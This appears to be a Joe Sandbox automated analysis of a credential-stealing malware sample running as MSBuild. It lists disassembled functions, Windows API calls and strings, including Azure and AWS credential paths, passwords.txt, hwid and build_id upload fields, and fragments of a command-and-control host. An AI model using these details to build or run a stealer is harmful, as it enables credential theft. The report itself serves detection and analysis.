Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID: passwords.txt
API String ID: 1956182324-347816968
Opcode ID: 0425c30be70ca39626462c834c4dfe654db9ea7e380ceb02c86be48175c27a70
Instruction ID: dc35adcabb2262aeaa3715ac701fce149c27e2d4e5217412d5f4b6884cb75f27
Opcode Fuzzy Hash: 0425c30be70ca39626462c834c4dfe654db9ea7e380ceb02c86be48175c27a70
Instruction Fuzzy Hash: E2814032900208AFCF05FFA1EE4A9CD7B76BF08316F205026F501B31A1EB7A5E559B59

Function 00404B2E Relevance: 35.4, APIs: 12, Strings: 8, Instructions: 378
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
StrCmpCA.SHLWAPI(?), ref: 00404BEB
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

lstrlenA.KERNEL32(?,00436953,",build_id,004377C4,------,004377B8,",hwid,004377A4,------), ref: 004050EE
lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
InternetCloseHandle.WININET(00000000), ref: 00405177
InternetCloseHandle.WININET(?), ref: 0040518E
InternetCloseHandle.WININET(?), ref: 0040519A

Strings

------, xrefs: 00404C75
------, xrefs: 00404DFB
HxA, xrefs: 00405222
hwid, xrefs: 00404EAD
", xrefs: 00405039
------, xrefs: 00404F5B
build_id, xrefs: 0040500D
", xrefs: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
String ID: "$"$------$------$------$HxA$build_id$hwid
API String ID: 3006978581-3648483202
Opcode ID: 4311e55ce33868b401eed5760171e0141d3d02343bc0573087fb32d4ef5704ac
Instruction ID: 21305393b516d721eabc2380545c4b93fc8e403c2138cad973479bd5099e6fae
Opcode Fuzzy Hash: 4311e55ce33868b401eed5760171e0141d3d02343bc0573087fb32d4ef5704ac
Instruction Fuzzy Hash: 0C02C371D5512A9ACF20EB21CD46ADDB7B5FF04308F4140E6A54873191DAB87ECA8FD8

Function 00401666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129memoryfileCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00401696
wsprintfW.USER32 ref: 004016BC
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
RtlAllocateHeap.NTDLL(00000000), ref: 00401705
_time64.MSVCRT ref: 0040170E
srand.MSVCRT ref: 00401715
rand.MSVCRT ref: 0040171E
_memset.LIBCMT ref: 0040172E
WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
_memset.LIBCMT ref: 00401763
CloseHandle.KERNEL32(?), ref: 00401771
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
_memset.LIBCMT ref: 004017BE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
RtlFreeHeap.NTDLL(00000000), ref: 004017CF
CloseHandle.KERNEL32(?), ref: 004017DB

Strings

%s%s, xrefs: 004016B6
delays.tmp, xrefs: 004016A4

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
String ID: %s%s$delays.tmp
API String ID: 1620473967-1413376734
Opcode ID: 39f734473f17f97426e056466eb3bebedc037311c24c273f22620d7e2f0f990d
Instruction ID: 9b5f552432b4e98a6f0c5797751fefc193ccc8af765751ef1568987e4d70ee72
Opcode Fuzzy Hash: 39f734473f17f97426e056466eb3bebedc037311c24c273f22620d7e2f0f990d
Instruction Fuzzy Hash: B641C6B1D00218ABDB205F61AC4CF9F7B7DEB85715F1016BAF00AE10A1DA394E54CF28

Function 004164BD Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004164E2

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416501
lstrcatA.KERNEL32(?,\.azure\), ref: 0041651E

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170

_memset.LIBCMT ref: 00416556
lstrcatA.KERNEL32(?,00000000), ref: 00416578
lstrcatA.KERNEL32(?,\.aws\), ref: 00416595

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
Part of subcall function 00415FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00416229
Part of subcall function 00415FD1: DeleteFileA.KERNEL32(?), ref: 0041629D
Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313

_memset.LIBCMT ref: 004165CA
lstrcatA.KERNEL32(?,00000000), ref: 004165EC
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416609
_memset.LIBCMT ref: 0041663E

Strings

\.azure\, xrefs: 00416512
Azure\.azure, xrefs: 00416531
\.IdentityService\, xrefs: 004165FD
Azure\.IdentityService, xrefs: 00416619
msal.cache, xrefs: 0041661E
*.*, xrefs: 004165AA
\.aws\, xrefs: 00416589
Azure\.aws, xrefs: 004165A5
*.*, xrefs: 00416536

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 780282842-974132213
Opcode ID: b2de320116ee48312a564d7ea93f2006b998ac76d702aa901ef76f6d1a7c5bf4
Instruction ID: 84896bacdfb64059cc425482cd21a2e289ba5d14c04e476c3e3a3401a8d995fd
Opcode Fuzzy Hash: b2de320116ee48312a564d7ea93f2006b998ac76d702aa901ef76f6d1a7c5bf4
Instruction Fuzzy Hash: E841C671D4021C7BDB14EB60EC47FDD7378AB09304F6044AAB605A7090EABDAB888F58

Function 0040ABE5 Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC8A
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD94
RtlAllocateHeap.NTDLL(00000000), ref: 0040AD9B
StrCmpCA.SHLWAPI(?,004373DC,00000000), ref: 0040AE4C
StrCmpCA.SHLWAPI(?,004373E0), ref: 0040AE74
lstrcatA.KERNEL32(00000000,?), ref: 0040AE98
lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA4
lstrcatA.KERNEL32(00000000,?), ref: 0040AEAE
lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBA
lstrcatA.KERNEL32(00000000,?), ref: 0040AEC4
lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED0
lstrcatA.KERNEL32(00000000,?), ref: 0040AEDA
lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE6
lstrcatA.KERNEL32(00000000,?), ref: 0040AEF0
lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFC
lstrcatA.KERNEL32(00000000,?), ref: 0040AF06
lstrcatA.KERNEL32(00000000,004373F8), ref: 0040AF12
lstrcatA.KERNEL32(00000000,?), ref: 0040AF1C
lstrcatA.KERNEL32(00000000,004373FC), ref: 0040AF28
lstrlenA.KERNEL32(00000000), ref: 0040AF7A
lstrlenA.KERNEL32(?), ref: 0040AF95
DeleteFileA.KERNEL32(?), ref: 0040AFD8

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: 4621e81a25ec7d59100a49f80eb619f1591ab482fb232c2b5530b01b4120e834
Instruction ID: fa65740cd413e8b43b9f1f3498c9fbd0cc5fbb49866f189318ef85710a93ab9e
Opcode Fuzzy Hash: 4621e81a25ec7d59100a49f80eb619f1591ab482fb232c2b5530b01b4120e834
Instruction Fuzzy Hash: D4C15D32904208AFDF15EBA1ED4A9DD7B76EF04309F20102AF501B30A1DB7A6E959F95

Function 00417151 Relevance: 29.0, APIs: 8, Strings: 8, Instructions: 1029networksleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

CloseHandle.KERNEL32(00000000,?,?,?,?,0041869F), ref: 004171ED
OpenEventA.KERNEL32(001F0003,00000000,?,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004171FC
CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041771A
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004177DB
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004177F4

Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB

Part of subcall function 004139C2: StrCmpCA.SHLWAPI(?,block,?,?,00417854), ref: 004139D7
Part of subcall function 004139C2: ExitProcess.KERNEL32 ref: 004139E2

Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6

Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A

Sleep.KERNEL32(000003E8), ref: 00417BAA

Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0041869F), ref: 00417210

Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417F41,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0

CloseHandle.KERNEL32(?), ref: 00418110

Strings

4b1193935308da1162176c44b42898a6, xrefs: 0041781C
.exe, xrefs: 00417659
hopto, xrefs: 00417FAF
.exe, xrefs: 00417F14
org, xrefs: 00417FF7
cowod., xrefs: 00417F8B
_DEBUG.zip, xrefs: 00418045
http://, xrefs: 00417F67

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
String ID: .exe$.exe$4b1193935308da1162176c44b42898a6$_DEBUG.zip$cowod.$hopto$http://$org
API String ID: 305159127-1036566790
Opcode ID: ba00fea598c8f9b7eb501b1df4ade5e40b70523d29f0704592d13bea502c8da9
Instruction ID: 4ceb97e4bc8bd76a369d1d2619bbd46815a38cac9c71142bc76181b4c2ec3f3b
Opcode Fuzzy Hash: ba00fea598c8f9b7eb501b1df4ade5e40b70523d29f0704592d13bea502c8da9
Instruction Fuzzy Hash: AC9244315483419FC620FF26D94268EB7E1FF84308F51482FF58463191DBB8AA8D8B9B

Function 004135A8 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 262stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004135EA
StrCmpCA.SHLWAPI(?,true), ref: 004136AC

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417284,004366CF,004366CE,?,?,?,?,0041869F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417284,004366CF,004366CE,?,?,?,?,0041869F), ref: 00410581

lstrcpyA.KERNEL32(?,?), ref: 0041376E
lstrcpyA.KERNEL32(?,00000000), ref: 0041379F
lstrcpyA.KERNEL32(?,00000000), ref: 004137DB
lstrcpyA.KERNEL32(?,00000000), ref: 00413817
lstrcpyA.KERNEL32(?,00000000), ref: 00413853
lstrcpyA.KERNEL32(?,00000000), ref: 0041388F
lstrcpyA.KERNEL32(?,00000000), ref: 004138CB
strtok_s.MSVCRT ref: 0041398F

Strings

zA, xrefs: 004139B4
false, xrefs: 004136C5
true, xrefs: 004136A6

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s$lstrlen
String ID: false$true$zA
API String ID: 2116072422-752889570
Opcode ID: 66d3b3fef956730522b2c25cb3aeaabc49fb5568f228d64d75f124df70e663f1
Instruction ID: f88d8e482521469d959c87b5d2553cfe3082ffd239838e960e1cb591ae3ba6ed
Opcode Fuzzy Hash: 66d3b3fef956730522b2c25cb3aeaabc49fb5568f228d64d75f124df70e663f1
Instruction Fuzzy Hash: 37B16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48

Function 00405237 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 161networkmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
RtlAllocateHeap.NTDLL(00000000), ref: 00405285
InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
StrCmpCA.SHLWAPI(?), ref: 004052C1
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
InternetCloseHandle.WININET(?), ref: 00405439
InternetCloseHandle.WININET(?), ref: 00405445
InternetCloseHandle.WININET(?), ref: 00405451

Strings

GET, xrefs: 00405325
lyA, xrefs: 00405250, 00405457, 0040539E

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET$lyA
API String ID: 442264750-528342985
Opcode ID: 7ac1dafda3322327fbe222a865cadfb00515a89be2541157445461943e6eb178
Instruction ID: 7cffea58bcaab2b22dbdd47c1de4c71017d1c0f04b9407cf92f8036c36bebf65
Opcode Fuzzy Hash: 7ac1dafda3322327fbe222a865cadfb00515a89be2541157445461943e6eb178
